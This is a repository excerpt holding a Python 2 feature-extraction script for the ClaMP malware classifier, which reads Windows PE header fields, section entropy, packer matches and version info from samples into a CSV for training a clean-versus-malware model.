"nbformat_minor": 2 675 | } 676 | -------------------------------------------------------------------------------- /extract.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #Integrated Featrues extraction for ClaMP 3 | 4 | #Written by: Ajit kumar, urwithajit9@gmail.com ,25Feb2015 5 | #Thanx to Ero Carrera for creating pefile. https://github.com/erocarrera/pefile 6 | 7 | #No license required for any kind of reuse 8 | #If using this script for your work, please refer this on your willingness 9 | 10 | #input: Directory path of samples 11 | #File path of output (csv) 12 | # Class label 0,1 (clean,malware) 13 | 14 | #output: csv with all extracted features 15 | 16 | #import required python modules 17 | 18 | #Need to install yara and pefile external python module 19 | # Need to compile PEiD signatures as yara rules ( scripts are available online, later i will upload this too) 20 | 21 | # Change at line 79 self.rules= yara.compile(filepath='/home/user/ClaMP/yara/peid.yara') to your comple rules 22 | 23 | import csv,os,pefile 24 | import yara 25 | import math 26 | 27 | class PE_features(): 28 | 29 | IMAGE_DOS_HEADER = [ 30 | "e_cblp",\ 31 | "e_cp", \ 32 | "e_cparhdr",\ 33 | "e_maxalloc",\ 34 | "e_sp",\ 35 | "e_lfanew"] 36 | 37 | FILE_HEADER= ["NumberOfSections","CreationYear"] + [ "FH_char" + str(i) for i in range(15)] 38 | 39 | OPTIONAL_HEADER1 = [ 40 | "MajorLinkerVersion",\ 41 | "MinorLinkerVersion",\ 42 | "SizeOfCode",\ 43 | "SizeOfInitializedData",\ 44 | "SizeOfUninitializedData",\ 45 | "AddressOfEntryPoint",\ 46 | "BaseOfCode",\ 47 | "BaseOfData",\ 48 | "ImageBase",\ 49 | "SectionAlignment",\ 50 | "FileAlignment",\ 51 | "MajorOperatingSystemVersion",\ 52 | "MinorOperatingSystemVersion",\ 53 | "MajorImageVersion",\ 54 | "MinorImageVersion",\ 55 | "MajorSubsystemVersion",\ 56 | "MinorSubsystemVersion",\ 57 | "SizeOfImage",\ 58 | "SizeOfHeaders",\ 59 | "CheckSum",\ 60 | "Subsystem"] 61 | 
OPTIONAL_HEADER_DLL_char = [ "OH_DLLchar" + str(i) for i in range(11)] 62 | 63 | OPTIONAL_HEADER2 = [ 64 | "SizeOfStackReserve",\ 65 | "SizeOfStackCommit",\ 66 | "SizeOfHeapReserve",\ 67 | "SizeOfHeapCommit",\ 68 | "LoaderFlags"] # boolean check for zero or not 69 | OPTIONAL_HEADER = OPTIONAL_HEADER1 + OPTIONAL_HEADER_DLL_char + OPTIONAL_HEADER2 70 | Derived_header = ["sus_sections","non_sus_sections", "packer","packer_type","E_text","E_data","filesize","E_file","fileinfo"] 71 | def __init__(self,source): 72 | self.source = source 73 | #Need PEiD rules compile with yara 74 | self.rules= yara.compile(filepath='./peid.yara') 75 | 76 | 77 | def file_creation_year(self,seconds): 78 | tmp = 1970 + ((int(seconds) / 86400) / 365) 79 | return int(tmp in range (1980,2017)) 80 | def FILE_HEADER_Char_boolean_set(self,pe): 81 | tmp = [pe.FILE_HEADER.IMAGE_FILE_RELOCS_STRIPPED,\ 82 | pe.FILE_HEADER.IMAGE_FILE_EXECUTABLE_IMAGE,\ 83 | pe.FILE_HEADER.IMAGE_FILE_LINE_NUMS_STRIPPED,\ 84 | pe.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED,\ 85 | pe.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM,\ 86 | pe.FILE_HEADER.IMAGE_FILE_LARGE_ADDRESS_AWARE,\ 87 | pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_LO,\ 88 | pe.FILE_HEADER.IMAGE_FILE_32BIT_MACHINE,\ 89 | pe.FILE_HEADER.IMAGE_FILE_DEBUG_STRIPPED,\ 90 | pe.FILE_HEADER.IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP,\ 91 | pe.FILE_HEADER.IMAGE_FILE_NET_RUN_FROM_SWAP,\ 92 | pe.FILE_HEADER.IMAGE_FILE_SYSTEM,\ 93 | pe.FILE_HEADER.IMAGE_FILE_DLL,\ 94 | pe.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY,\ 95 | pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_HI 96 | ] 97 | return [int(s) for s in tmp] 98 | def OPTIONAL_HEADER_DLLChar(self,pe): 99 | tmp = [ 100 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,\ 101 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY,\ 102 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NX_COMPAT,\ 103 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION,\ 104 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH,\ 105 | 
pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND,\ 106 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER,\ 107 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,\ 108 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA,\ 109 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_APPCONTAINER,\ 110 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_GUARD_CF 111 | ] 112 | return [int(s) for s in tmp] 113 | def Optional_header_ImageBase(self,ImageBase): 114 | result= 0 115 | if ImageBase % (64 * 1024) == 0 and ImageBase in [268435456,65536,4194304]: 116 | result = 1 117 | return result 118 | def Optional_header_SectionAlignment(self,SectionAlignment,FileAlignment): 119 | """This is boolean function and will return 0 or 1 based on condidtions 120 | that it SectionAlignment must be greater than or equal to FileAlignment 121 | """ 122 | return int(SectionAlignment >= FileAlignment) 123 | def Optional_header_FileAlignment(self,SectionAlignment,FileAlignment): 124 | result =0 125 | if SectionAlignment >= 512: 126 | if FileAlignment % 2 == 0 and FileAlignment in range(512,65537): 127 | result =1 128 | else: 129 | if FileAlignment == SectionAlignment: 130 | result = 1 131 | return result 132 | def Optional_header_SizeOfImage(self,SizeOfImage,SectionAlignment): 133 | 134 | return int(SizeOfImage % SectionAlignment == 0) 135 | def Optional_header_SizeOfHeaders(self,SizeOfHeaders,FileAlignment): 136 | 137 | return int(SizeOfHeaders % FileAlignment == 0 ) 138 | def extract_dos_header(self,pe): 139 | IMAGE_DOS_HEADER_data = [ 0 for i in range(6)] 140 | try: 141 | IMAGE_DOS_HEADER_data = [ 142 | pe.DOS_HEADER.e_cblp,\ 143 | pe.DOS_HEADER.e_cp, \ 144 | pe.DOS_HEADER.e_cparhdr,\ 145 | pe.DOS_HEADER.e_maxalloc,\ 146 | pe.DOS_HEADER.e_sp,\ 147 | pe.DOS_HEADER.e_lfanew] 148 | except Exception, e: 149 | print e 150 | return IMAGE_DOS_HEADER_data 151 | def extract_file_header(self,pe): 152 | FILE_HEADER_data = [ 0 for i in range(3)] 153 | FILE_HEADER_char = [] 154 
| try: 155 | FILE_HEADER_data = [ 156 | pe.FILE_HEADER.NumberOfSections, \ 157 | self.file_creation_year(pe.FILE_HEADER.TimeDateStamp)] 158 | FILE_HEADER_char = self.FILE_HEADER_Char_boolean_set(pe) 159 | except Exception, e: 160 | print e 161 | return FILE_HEADER_data + FILE_HEADER_char 162 | def extract_optional_header(self,pe): 163 | OPTIONAL_HEADER_data = [ 0 for i in range(21)] 164 | DLL_char =[] 165 | OPTIONAL_HEADER_data2 = [ 0 for i in range(6)] 166 | 167 | try: 168 | OPTIONAL_HEADER_data = [ 169 | pe.OPTIONAL_HEADER.MajorLinkerVersion,\ 170 | pe.OPTIONAL_HEADER.MinorLinkerVersion,\ 171 | pe.OPTIONAL_HEADER.SizeOfCode,\ 172 | pe.OPTIONAL_HEADER.SizeOfInitializedData,\ 173 | pe.OPTIONAL_HEADER.SizeOfUninitializedData,\ 174 | pe.OPTIONAL_HEADER.AddressOfEntryPoint,\ 175 | pe.OPTIONAL_HEADER.BaseOfCode,\ 176 | pe.OPTIONAL_HEADER.BaseOfData,\ 177 | #Check the ImageBase for the condition 178 | self.Optional_header_ImageBase(pe.OPTIONAL_HEADER.ImageBase),\ 179 | # Checking for SectionAlignment condition 180 | self.Optional_header_SectionAlignment(pe.OPTIONAL_HEADER.SectionAlignment,pe.OPTIONAL_HEADER.FileAlignment),\ 181 | #Checking for FileAlignment condition 182 | self.Optional_header_FileAlignment(pe.OPTIONAL_HEADER.SectionAlignment,pe.OPTIONAL_HEADER.FileAlignment),\ 183 | pe.OPTIONAL_HEADER.MajorOperatingSystemVersion,\ 184 | pe.OPTIONAL_HEADER.MinorOperatingSystemVersion,\ 185 | pe.OPTIONAL_HEADER.MajorImageVersion,\ 186 | pe.OPTIONAL_HEADER.MinorImageVersion,\ 187 | pe.OPTIONAL_HEADER.MajorSubsystemVersion,\ 188 | pe.OPTIONAL_HEADER.MinorSubsystemVersion,\ 189 | #Checking size of Image 190 | self.Optional_header_SizeOfImage(pe.OPTIONAL_HEADER.SizeOfImage,pe.OPTIONAL_HEADER.SectionAlignment),\ 191 | #Checking for size of headers 192 | self.Optional_header_SizeOfHeaders(pe.OPTIONAL_HEADER.SizeOfHeaders,pe.OPTIONAL_HEADER.FileAlignment),\ 193 | pe.OPTIONAL_HEADER.CheckSum,\ 194 | pe.OPTIONAL_HEADER.Subsystem] 195 | 196 | DLL_char = 
self.OPTIONAL_HEADER_DLLChar(pe) 197 | 198 | OPTIONAL_HEADER_data2= [ 199 | pe.OPTIONAL_HEADER.SizeOfStackReserve,\ 200 | pe.OPTIONAL_HEADER.SizeOfStackCommit,\ 201 | pe.OPTIONAL_HEADER.SizeOfHeapReserve,\ 202 | pe.OPTIONAL_HEADER.SizeOfHeapCommit,\ 203 | int(pe.OPTIONAL_HEADER.LoaderFlags == 0) ] 204 | except Exception, e: 205 | print e 206 | return OPTIONAL_HEADER_data + DLL_char + OPTIONAL_HEADER_data2 207 | def get_count_suspicious_sections(self,pe): 208 | result=[] 209 | tmp =[] 210 | benign_sections = set(['.text','.data','.rdata','.idata','.edata','.rsrc','.bss','.crt','.tls']) 211 | for section in pe.sections: 212 | tmp.append(section.Name.split('\x00')[0]) 213 | non_sus_sections = len(set(tmp).intersection(benign_sections)) 214 | result=[len(tmp) - non_sus_sections, non_sus_sections] 215 | return result 216 | def check_packer(self,filepath): 217 | result=[] 218 | matches = self.rules.match(filepath) 219 | if matches == [] or matches == {}: 220 | result.append([0]) 221 | else: 222 | result.append([1]) 223 | return result 224 | def get_text_data_entropy(self,pe): 225 | result=[0.0,0.0] 226 | for section in pe.sections: 227 | s_name = section.Name.split('\x00')[0] 228 | if s_name == ".text": 229 | result[0]= section.get_entropy() 230 | elif s_name == ".data": 231 | result[1]= section.get_entropy() 232 | else: 233 | pass 234 | return result 235 | def get_file_bytes_size(self,filepath): 236 | f = open(filepath, "rb") 237 | byteArr = map(ord, f.read()) 238 | f.close() 239 | fileSize = len(byteArr) 240 | return byteArr,fileSize 241 | def cal_byteFrequency(self,byteArr,fileSize): 242 | freqList = [] 243 | for b in range(256): 244 | ctr = 0 245 | for byte in byteArr: 246 | if byte == b: 247 | ctr += 1 248 | freqList.append(float(ctr) / fileSize) 249 | return freqList 250 | def get_file_entropy(self,filepath): 251 | byteArr, fileSize = self.get_file_bytes_size(filepath) 252 | freqList = self.cal_byteFrequency(byteArr,fileSize) 253 | # Shannon entropy 254 | ent = 0.0 
255 | for freq in freqList: 256 | if freq > 0: 257 | ent += - freq * math.log(freq, 2) 258 | 259 | #ent = -ent 260 | 261 | return [fileSize,ent] 262 | def get_fileinfo(self,pe): 263 | result=[] 264 | try: 265 | FileVersion = pe.FileInfo[0].StringTable[0].entries['FileVersion'] 266 | ProductVersion = pe.FileInfo[0].StringTable[0].entries['ProductVersion'] 267 | ProductName = pe.FileInfo[0].StringTable[0].entries['ProductName'] 268 | CompanyName = pe.FileInfo[0].StringTable[0].entries['CompanyName'] 269 | #getting Lower and 270 | FileVersionLS = pe.VS_FIXEDFILEINFO.FileVersionLS 271 | FileVersionMS = pe.VS_FIXEDFILEINFO.FileVersionMS 272 | ProductVersionLS = pe.VS_FIXEDFILEINFO.ProductVersionLS 273 | ProductVersionMS = pe.VS_FIXEDFILEINFO.ProductVersionMS 274 | except Exception, e: 275 | result=["error"] 276 | #print "{} while opening {}".format(e,filepath) 277 | else: 278 | #shifting byte 279 | FileVersion = (FileVersionMS >> 16, FileVersionMS & 0xFFFF, FileVersionLS >> 16, FileVersionLS & 0xFFFF) 280 | ProductVersion = (ProductVersionMS >> 16, ProductVersionMS & 0xFFFF, ProductVersionLS >> 16, ProductVersionLS & 0xFFFF) 281 | result = [FileVersion,ProductVersion,ProductName,CompanyName] 282 | return int ( result[0] != 'error') 283 | 284 | def extract_all(self,filepath): 285 | data =[] 286 | #load given file 287 | try: 288 | pe = pefile.PE(filepath) 289 | except Exception, e: 290 | print "{} while opening {}".format(e,filepath) 291 | else: 292 | data += self.extract_dos_header(pe) 293 | data += self.extract_file_header(pe) 294 | data += self.extract_optional_header(pe) 295 | # derived features 296 | #number of suspicisou sections and non-suspicsious section 297 | num_ss_nss = self.get_count_suspicious_sections(pe) 298 | data += num_ss_nss 299 | # check for packer and packer type 300 | packer = self.check_packer(filepath) 301 | # Appending the packer info to the rest of features 302 | data += packer[0] 303 | entropy_sections = self.get_text_data_entropy(pe) 304 | 
data += entropy_sections 305 | f_size_entropy = self.get_file_entropy(filepath) 306 | data += f_size_entropy 307 | fileinfo = self.get_fileinfo(pe) 308 | data.append(fileinfo) 309 | 310 | 311 | return data 312 | 313 | def get_feature(self, filepath): 314 | 315 | data = self.extract_all(filepath) 316 | 317 | 318 | --------------------------------------------------------------------------------